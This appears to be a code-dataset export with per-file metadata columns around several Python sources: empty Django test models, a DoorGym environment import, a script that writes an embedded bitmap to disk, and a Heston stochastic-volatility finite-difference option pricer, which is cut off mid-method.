| 0.41791
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06
| 0.159664
| 119
| 3
| 101
| 39.666667
| 0.61
| 0.117647
| 0
| 0
| 0
| 1
| 0.728155
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
17cb510aa0598b70d330c35f65920a16e0ab3586
| 105
|
py
|
Python
|
test/testapp/models.py
|
Unholster/django-lookup
|
566590540b27270020ba3728f88f52f8a03d1e03
|
[
"MIT"
] | null | null | null |
test/testapp/models.py
|
Unholster/django-lookup
|
566590540b27270020ba3728f88f52f8a03d1e03
|
[
"MIT"
] | 2
|
2020-06-05T23:24:16.000Z
|
2021-06-10T22:03:16.000Z
|
test/testapp/models.py
|
Unholster/django-lookup
|
566590540b27270020ba3728f88f52f8a03d1e03
|
[
"MIT"
] | 1
|
2015-10-22T15:35:44.000Z
|
2015-10-22T15:35:44.000Z
|
from django.db import models
class Thing(models.Model):
    """Empty model with no fields — presumably a lookup target for the
    test app (TODO confirm against the test suite)."""
    pass
class Thang(models.Model):
    """Second empty model, mirroring Thing — presumably used to exercise
    lookups across multiple model classes (TODO confirm)."""
    pass
| 10.5
| 28
| 0.704762
| 15
| 105
| 4.933333
| 0.666667
| 0.297297
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.209524
| 105
| 9
| 29
| 11.666667
| 0.891566
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
17dda168e634719a3eacd0c1cd6a0155e7d90fcf
| 122
|
py
|
Python
|
doorenv2/doorenv2/envs/__init__.py
|
kuolunwang/DoorGym
|
d9fbb67382756e659025b640857ede3a3735fb1d
|
[
"BSD-3-Clause"
] | 82
|
2019-08-07T06:54:44.000Z
|
2022-02-02T16:44:33.000Z
|
doorenv2/doorenv2/envs/__init__.py
|
kuolunwang/DoorGym
|
d9fbb67382756e659025b640857ede3a3735fb1d
|
[
"BSD-3-Clause"
] | 4
|
2019-11-28T09:02:51.000Z
|
2022-01-24T03:21:44.000Z
|
doorenv2/doorenv2/envs/__init__.py
|
kuolunwang/DoorGym
|
d9fbb67382756e659025b640857ede3a3735fb1d
|
[
"BSD-3-Clause"
] | 20
|
2019-08-11T13:42:18.000Z
|
2022-01-03T08:47:50.000Z
|
from doorenv2.envs.doorenv_blue import DoorEnvBlueV1, DoorEnvBlueV2
from doorenv2.envs.doorenv_baxter import DoorEnvBaxter
| 61
| 67
| 0.893443
| 15
| 122
| 7.133333
| 0.666667
| 0.224299
| 0.299065
| 0.429907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035088
| 0.065574
| 122
| 2
| 68
| 61
| 0.903509
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
17e41db585a499c4674b07bfc98cefadaf1ef26c
| 3,704
|
py
|
Python
|
E035/main.py
|
alperkonuralp/AlperIlePython
|
64e4940648a74306951dbfd97b593cfbcd94b7f6
|
[
"Apache-2.0"
] | 1
|
2021-01-30T16:50:40.000Z
|
2021-01-30T16:50:40.000Z
|
E035/main.py
|
alperkonuralp/AlperIlePython
|
64e4940648a74306951dbfd97b593cfbcd94b7f6
|
[
"Apache-2.0"
] | null | null | null |
E035/main.py
|
alperkonuralp/AlperIlePython
|
64e4940648a74306951dbfd97b593cfbcd94b7f6
|
[
"Apache-2.0"
] | null | null | null |
content = b'BM\xbc\x03\x00\x00\x00\x00\x00\x006\x00\x00\x00(\x00\x00\x00\x1e\x00\x00\x00\x0f\x00\x00\x00\x01\x00\x10\x00\x00\x00\x00\x00\x86\x03\x00\x00\x12\x0b\x00\x00\x12\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x7f\xff\x7f\xff\x7f\xdf{\x7fo\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xbf \xbfZ\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f?k\x1f\x14\x1f\x14\xbf=\xff\x7f\xff\x7f\xbf \x1f\x14\xbf=\xff\x7f\xff\x7f\xffE\x1f\x14\x1f\x14\xbfZ\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f?k\x1f\x14\x1f\x14\xbf=\xff\x7f\x1fc\x1f\x14\x1f\x14\x1f\x14\x9fs\xff\x7f\xbf=\x1f\x14\x1f\x14\xbfZ\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\x7fR\x1f\x14\x1f\x14\x1f\x14\x7fo\xff\x7f\xff\x7f\xff\x7f\xff\x7f?k\x1f\x14\x1f\x14\xbf=\xff\x7f\x7fR\x1f\x14\x1f\x14\x1f\x14\xbfZ\xff\x7f\xbf=\x1f\x14\x1f\x14\xbfZ\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\xbfZ\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xdf{\x1f\x14\x1f\x14\x1f-\xff\x7f\x1f-\x1f\x14\x1f\x14\x1f\x14\xffE\xff\x7f\xbf=\x1f\x14\x1f\x14\x1fc\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\x7fo\x1f\x14\x1f\x14\x1f\x14\x1fc\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x9fs\x1f\x14\x1f\x14\xbf \x1f\x14\x1f\x14\xdf{\xbf=\x1f\x14\x1f\x14?k\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\xdf^\x1f\x14\x1f\x14?J\x1f\x14\x1f\x14\xdf^\xbf=\x1f\x14\x1f\x14?k\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14?J\x1f\x14\x1f\x14\x7fo\xbf \x1f\x14\xffE\x7f5\x1f\x14\x1f\x14?k\xff\x7f\x1f\x14\x1f\x14\x1f\x14?J\xffE\xbf 
\x1f\x14\x1f\x14\xdf^\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x7f5\x1f\x14\x1f\x14\x1f-\x1f\x14\xbf \xff\x7f?J\x1f\x14\xbf \x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\x1fc\x1f\x14\x1f\x14\xbf \xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xbf=\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xdf^\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\xbfZ\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xbf=\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xdf^\xff\x7f\xdf{\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xbf=\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xdf{\xff\x7f\xff\x7f\xffE\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xffE\xdf{\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xbfZ\x1f\x14\x1f\x14\x1f\x14\x7f5\xff\x7f\xff\x7f\xff\x7f\xdf^\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\xff\x7f\x1fc\xbfZ\xbfZ\xbfZ\x1fc\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x7fo\xbfZ\xbfZ\xbfZ\x7fo\xff\x7f\xff\x7f\xff\x7f\xdf{\xbfZ\xbfZ\xbfZ\xbfZ\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x00\x00'
# Report the size of the embedded byte payload (the 'BM' header suggests a
# bitmap image — presumably the length matches the size field in the header;
# TODO confirm).
print(len(content))

# Dump the raw bytes to disk as a .bmp file.
with open('deneme.bmp', 'wb') as f:
    f.write(content)

# Column rulers, apparently used while hand-decoding header byte offsets:
# 012345678911111111112222222222333
# 01234567890123456789012
# 0123456789ABCDEF11111111111111112
# 0123456789ABCDEF0
| 246.933333
| 3,463
| 0.735421
| 872
| 3,704
| 3.123853
| 0.049312
| 0.396476
| 0.439427
| 0.585903
| 0.889868
| 0.860132
| 0.84141
| 0.776799
| 0.776799
| 0.698238
| 0
| 0.250276
| 0.020518
| 3,704
| 14
| 3,464
| 264.571429
| 0.500551
| 0.036447
| 0
| 0
| 0
| 0.25
| 0.97493
| 0.969296
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 16
|
a4ac91f73a2b102420de1464bbb183f1e2b6cd82
| 93,539
|
py
|
Python
|
src/python/hestonclv_jac_ls_trans.py
|
fabienlefloch/pythonjuliapde
|
8577c3bcbe8f6caef22922fa78ba34afaa5abe35
|
[
"Apache-2.0"
] | null | null | null |
src/python/hestonclv_jac_ls_trans.py
|
fabienlefloch/pythonjuliapde
|
8577c3bcbe8f6caef22922fa78ba34afaa5abe35
|
[
"Apache-2.0"
] | null | null | null |
src/python/hestonclv_jac_ls_trans.py
|
fabienlefloch/pythonjuliapde
|
8577c3bcbe8f6caef22922fa78ba34afaa5abe35
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import math
import time
from scipy.sparse import csc_matrix, lil_matrix, dia_matrix, identity, linalg as sla
from scipy import linalg as la
from scipy.stats import ncx2
from scipy import integrate
from scipy import interpolate
from matplotlib import pyplot as plt
#from mpl_toolkits.mplot3d import Axes3D
import numba
from numba import jit
# Heston model parameters (module-level defaults for the scripts below).
v0=0.05412     # initial instantaneous variance
theta=0.04     # long-run variance level
sigma=0.3      # volatility of variance (vol-of-vol)
kappa=1.5      # mean-reversion speed of the variance process
rho=-0.9       # correlation between spot and variance drivers
r=0.02         # risk-free rate
q=0.05         # dividend yield
T=0.15         # maturity in years
refPrice=4.108362515 #rouah reference value (overridden just below)
refPrice = 8.89486909 #albrecher reference value -- the one actually used
def priceCall(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, cFunc, K, B, N, M, L):
isCall = False
method = "LS" # "LS","CN","DO"
smoothing = "KreissF" #"Kreiss","Averaging","None"
useDamping = False
useLinear = False
useVLinear = False
useExponentialFitting = True
upwindingThreshold = 1.0
epsilon = 1e-4
dChi = 4*kappa*theta/(sigma*sigma)
chiN = 4*kappa*math.exp(-kappa*T)/(sigma*sigma*(1-math.exp(-kappa*T)))
vmax = ncx2.ppf((1-epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
vmin = ncx2.ppf((epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
vmin = max(1e-4,vmin)
#print("vmax",vmin,vmax, 10*v0)
#vmax=10.0*v0
#vmin = 0
V = np.arange(L)*(vmax/(L-1))
W = V
hl = W[1]-W[0]
JV=np.ones(L)
JVm=np.ones(L)
if not useVLinear:
vscale = v0
u = np.linspace(0,1,L) #1e-4,math.sqrt(vmax),L) #ideally, concentrated around v0: V=sinh((w-w0)/c). w unif
c1 = math.asinh((vmin-v0)/vscale)
c2 = math.asinh((vmax-v0)/vscale)
V = v0 + vscale*np.sinh((c2-c1)*u+c1)
hl = u[1]-u[0]
JV = vscale*(c2-c1)* np.cosh((c2-c1)*u+c1)
JVm = vscale*(c2-c1)* np.cosh((c2-c1)*(u-hl/2)+c1)
Xspan = 4*math.sqrt(theta*T)
Xmin = math.log(K) - Xspan + (r-q)*T -0.5*v0*T
Xmax = math.log(K) + Xspan + (r-q)*T -0.5*v0*T
X = np.linspace(Xmin,Xmax,M)
hm = X[1]-X[0]
#X+=hm/2
S = np.exp(X)
J= np.exp(X)
Jm= np.exp(X-hm/2)
#S lin
if useLinear:
#S=np.linspace(0,K*4,M)
S=np.linspace(0,math.exp(Xmax),M)
X=S
hm = X[1]-X[0]
# X+=hm/2
S=X
J=np.ones(M)
Jm=np.ones(M)
cFuncEval = np.vectorize(cFunc.evaluate)
Sc = np.array([cFunc.evaluate(T, Si) for Si in S])
if isCall:
F0 = np.maximum(Sc-K,0)
else:
F0 = np.maximum(K-Sc,0)
F0smooth = np.array(F0,copy=True)
Kinv = cFunc.solve(K)
if smoothing == "Averaging":
iStrike = np.searchsorted(S,Kinv) # S[i-1]<K<=S[i]
if Kinv < (S[iStrike]+S[iStrike-1])/2:
iStrike -= 1
payoff1 = lambda v: cFunc.evaluate(T,v)-K
payoff1 = np.vectorize(payoff1)
value = 0
if isCall:
a = (S[iStrike]+S[iStrike+1])/2
value = integrate.quad( payoff1, Kinv, a)
else:
a = (S[iStrike]+S[iStrike-1])/2 # int a,lnK K-eX dX = K(a-lnK)+ea-K
value = integrate.quad( payoff1, Kinv, a)
h = (S[iStrike+1]-S[iStrike-1])/2
F0smooth[iStrike] = value[0]/h
elif smoothing == "Kreiss":
iStrike = np.searchsorted(S,Kinv) # S[i-1]<K<=S[i]
xmk = S[iStrike]
h = (S[iStrike+1]-S[iStrike-1])/2
payoff1 = lambda v: (cFunc.evaluate(T,xmk-v)-K)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[iStrike]
if isCall:
value1 = integrate.quad( payoff1, 0,xmk-Kinv)
value0 = integrate.quad( payoff1, -h, 0)
value = (value0[0]+value1[0]) /h
F0smooth[iStrike] = value
iStrike -= 1
xmk = S[iStrike]
payoff1 = lambda v: (cFunc.evaluate(T,xmk-v)-K)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[iStrike]
if isCall:
value1 = integrate.quad( payoff1, -h,xmk-Kinv)
value = (value1[0]) /h
F0smooth[iStrike] = value
elif smoothing=="KreissF":
for i in range(M):
xmk = S[i]
sign = 1
if not isCall:
sign = -1
h = hm #(X[i+1]-X[i-1])/2
payoff1 = lambda v: max(sign*(cFunc.evaluate(T,xmk-v)-K),0)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[i]
value1 = integrate.quad( payoff1, 0,h)
value0 = integrate.quad( payoff1, -h, 0)
value = (value0[0]+value1[0]) /h
#print("new value",value,Xi,iXi)
F0smooth[i] = value
elif smoothing=="KreissF4":
for i in range(M):
xmk = S[i]
sign = 1
if not isCall:
sign = -1
h = hm #(X[i+1]-X[i-1])/2
payoff1 = lambda v: max(sign*(cFunc.evaluate(T,xmk-v)-K),0)*1.0/72*(56*pow(abs(v/h),3) -pow(abs(v/h-3),3) +12*pow(abs(v/h-2),3) -39*pow(abs(v/h-1),3) -39*pow(abs(v/h+1),3) +12*pow(abs(v/h+2),3) -pow(abs(v/h+3),3))
payoff1 = np.vectorize(payoff1)
value = F0smooth[i]
value1 = integrate.quad( payoff1, 0,3*h)
value0 = integrate.quad( payoff1, -3*h, 0)
value = (value0[0]+value1[0]) /h
#print("new value",value,Xi,iXi)
F0smooth[i] = value
#print("F0smooth",F0smooth)
iBarrier = 1
if not B == 0:
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
F = []
for j in range(L):
F = np.append(F,F0smooth)
dt = -T/N
A01 = lil_matrix((L*M,L*M))
A02 = lil_matrix((L*M,L*M))
A1 = lil_matrix((L*M,L*M))
A2 = lil_matrix((L*M,L*M))
#boundary conditions, 0,0, 0,L-1, M-1,0, M-1,L-1.
i=0
j=0
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+1+(j+1)*M]+=rij
#A[i+j*M,i+1+(j)*M]+=-rij
#A[i+j*M,i+(j+1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
i=0
j=L-1
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += rij
#A[i+j*M,i+1+(j-1)*M]+=-rij
#A[i+j*M,i+1+(j)*M]+=rij
#A[i+j*M,i+(j-1)*M]+=rij
#A[i+j*M,i+(j)*M]+=-rij
i=M-1
j=L-1
rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
i=M-1
j=0
rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j+1)*M]+=-rij
#A[i+j*M,i-1+(j)*M]+=rij
#A[i+j*M,i+(j+1)*M]+=rij
#A[i+j*M,i+(j)*M]+=-rij
for i in range(1,M-1):
j=0
svi = S[i]*S[i]*V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
drifti = (r-q)*S[i]
if useExponentialFitting:
if svi > 0 and abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
#svi = svi +0.5*abs(drifti)*hm
svi = svi/(2*hm*hm)
A1[i+j*M,(i+1)+j*M] += dt*(svi/Jm[i+1]+drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*(1.0/Jm[i+1]+1.0/Jm[i])-r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(svi/Jm[i]-drifti/(2*J[i]*hm))
A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
#A[i+j*M,i+1+(j+1)*M]+=rij
#A[i+j*M,i+1+(j)*M]+=-rij
#A[i+j*M,i+(j+1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
j=L-1
svi = S[i]*S[i]*V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
drifti = (r-q)*S[i]
if useExponentialFitting:
if svi > 0 and abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
#svi = svi +0.5*abs(drifti)*hm
svi = svi/(2*hm*hm)
rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(svi/Jm[i]-drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*(1.0/Jm[i+1]+1.0/Jm[i])-r*0.5)
A1[i+j*M,(i+1)+j*M] += dt*(svi/Jm[i+1]+drifti/(2*J[i]*hm))
A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
for j in range(1,L-1):
#boundary conditions i=0,M-1.
i=0
A1[i+j*M,(i+1)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
i=M-1
rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=+rij
for i in range(1,M-1):
svi = S[i]*S[i]*V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
svj = sigma*sigma*V[j]/(JV[j])
drifti = (r-q)*S[i]
driftj = kappa*(theta-V[j])
if useExponentialFitting:
if abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
# svi = svi +0.5*abs(drifti)*hm
if driftj != 0 and abs(driftj*hl/svj) > 1.0:
# svj = svj +0.5*abs(driftj)*hl
svj = driftj*hl/math.tanh(driftj*hl/svj)
rij = dt*0.25*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*(0.5*svi/(hm*hm*Jm[i+1])+drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*0.5/(hm*hm)*(1.0/Jm[i+1]+1.0/Jm[i]) -r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(0.5*svi/(hm*hm*Jm[i])-drifti/(2*J[i]*hm))
A2[i+j*M,i+(j+1)*M] += dt*(0.5*svj/(hl*hl*JVm[j+1])+driftj/(2*JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5-svj*0.5/(hl*hl)*(1.0/JVm[j+1]+1.0/JVm[j]))
A2[i+j*M,i+(j-1)*M] += dt*(svj*0.5/(JVm[j]*hl*hl)-driftj/(2*JV[j]*hl))
A01[i+j*M,i+1+(j+1)*M]+= rij
A02[i+j*M,i+1+(j-1)*M]+=-rij
A02[i+j*M,i-1+(j+1)*M]+=-rij
A01[i+j*M,i-1+(j-1)*M]+=rij
A01[i+j*M,i+(j)*M]+=-2*rij
A02[i+j*M,i+(j)*M]+=2*rij
A0 = (A01+A02).tolil()
#print((A0+A1+A2).shape)
# print((A0+A1+A2)[:,1000].getnnz())
#plt.spy(A0+A1+A2,markersize=1)
#plt.show()
#ax = plot_coo_matrix(A0+A1+A2)
#ax.figure.show(block=True)
#plt.show(ax.figure)
#raise Error
I = identity(M*L,format="csc")
A0Full = A0.copy()
A1Full = A1.copy()
A2Full = A2.copy()
BC = lil_matrix((L*M,L*M))
#boundary conditions j=0,L-1.
start=time.time()
if useDamping:
A = A0+A1+A2
a = 0.5
Li = I+a*A + BC
lu = sla.splu(Li)
updatePayoffBoundary(F, Sc, B, iBarrier, M,L)
F = lu.solve(F)
updatePayoffBoundary(F, Sc, B, iBarrier, M,L)
F = lu.solve(F)
N -= 1
if method == "CS":
a = 0.5
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicit(Y0, S, B, iBarrier, M,L)
Y0r = Y0+a*A1*F
updatePayoffBoundary(Y0r, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0r)
Y1r = Y1+a*A2*F
updatePayoffBoundary(Y1r, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1r)
Y0t = Y0 - 0.5*(A0*Y2-A0*F)
Y0r = Y0t+a*A1*F
updatePayoffBoundary(Y0r, Sc, B, iBarrier, M,L)
Y1t = lu1.solve(Y0r)
Y1r = Y1t+a*A2*F
updatePayoffBoundary(Y1r, Sc, B, iBarrier, M,L)
Y2t = lu2.solve(Y1r)
F = Y2t
elif method == "HW":
a = 0.5+math.sqrt(3)/6
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicit(Y0, S, B, iBarrier, M,L)
Y0 = Y0+a*A1*F
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*F
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
#updatePayoffExplicit(Y2, S, B, iBarrier, M,L)
Y0 = F-0.5*(A0+A1+A2)*(F+Y2)
Y0 = Y0+a*A1*Y2
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*Y2
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
F = Y2
elif method == "DO":
a = 0.5
